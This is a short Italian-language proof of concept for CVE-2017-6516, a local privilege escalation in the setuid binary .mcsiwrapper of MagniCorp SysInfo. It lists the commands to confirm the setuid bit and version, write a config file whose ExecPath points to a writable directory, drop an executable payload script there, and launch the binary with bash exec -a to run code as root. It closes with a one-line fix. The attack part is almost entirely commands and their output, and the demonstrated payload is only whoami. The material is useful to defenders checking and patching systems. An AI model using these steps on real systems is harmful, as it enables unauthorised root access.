
Un PoC / metodologia per sfruttare CVE-2017-6516
CVE-2017-6516 è una vulnerabilità di escalation dei privilegi che colpisce il binario .mcsiwrapper di MagniCorp SysInfo versione 10-H64. Quando questo binario ha il bit SUID impostato ed è obsoleto, un utente può eseguire codice arbitrario come il proprietario del binario - che spesso è root.
.mcsiwrapper deve essere setuid:$ ls -l .mcsiwrapper
-rwsr-xr-x 1 root root .mcsiwrapper
.mcsiwrapper deve essere sotto la versione 10-H64:$ .mcsiwrapper --version
<Version under 10-H64>
Crea un file config con il seguente contenuto:
ExecPath=<Path to a writeable directory>
Crea un file eseguibile payload nella directory ExecPath, ad esempio:
#!/bin/sh
whoami
E rendilo eseguibile:
$ chmod +x payload
Esegui il comando:
$ bash -c "exec -a payload .mcsiwrapper --configfile <path to config file>"
root
Aggiorna .mcsiwrapper almeno alla versione 10-H64.